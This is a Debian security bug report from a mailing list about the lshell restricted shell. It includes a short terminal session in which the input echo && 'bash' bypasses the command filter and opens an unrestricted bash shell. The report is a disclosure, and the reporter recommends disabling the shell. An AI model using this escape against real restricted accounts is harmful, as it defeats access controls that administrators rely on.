[Secure-testing-team] Bug#834949: lshell: Shell outbreak due to bad syntax parse
Vladislav Yarmak
yarmak.vladislav at gmail.com
Sat Aug 20 20:15:12 UTC 2016
Package: lshell
Version: 0.9.16-1
Severity: grave
Tags: security upstream
Justification: user security hole
lshell fails to parse shell syntax correctly and restrictions can be overrun:
root at debian:~# getent passwd testuser
testuser:x:1001:1001:,,,:/home/testuser:/usr/bin/lshell
root at debian:~# su - testuser
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd clear echo exit help history ll lpath ls lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo && 'bash'
testuser at debian:~$ ps -f
UID PID PPID C STIME TTY TIME CMD
testuser 4000 3999 0 23:12 pts/1 00:00:00 /usr/bin/python /usr/bin/lshell
testuser 4001 4000 0 23:12 pts/1 00:00:00 sh -c set -m; echo && 'bash'
testuser 4002 4001 0 23:12 pts/1 00:00:00 bash
testuser 4007 4002 0 23:13 pts/1 00:00:00 ps -f
Problem exists in current upstream code. There are opened issue on Github but no reaction yet: https://github.com/ghantoos/lshell/issues/147.
Command parser in this shell is beyound of recovery. I recommend to replace this shell with symlink to /usr/sbin/nologin.
-- System Information:
Debian Release: 8.5
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages lshell depends on:
ii adduser 3.113+nmu3
ii python 2.7.9-1
lshell recommends no packages.
lshell suggests no packages.
-- no debconf information
More information about the Secure-testing-team
mailing list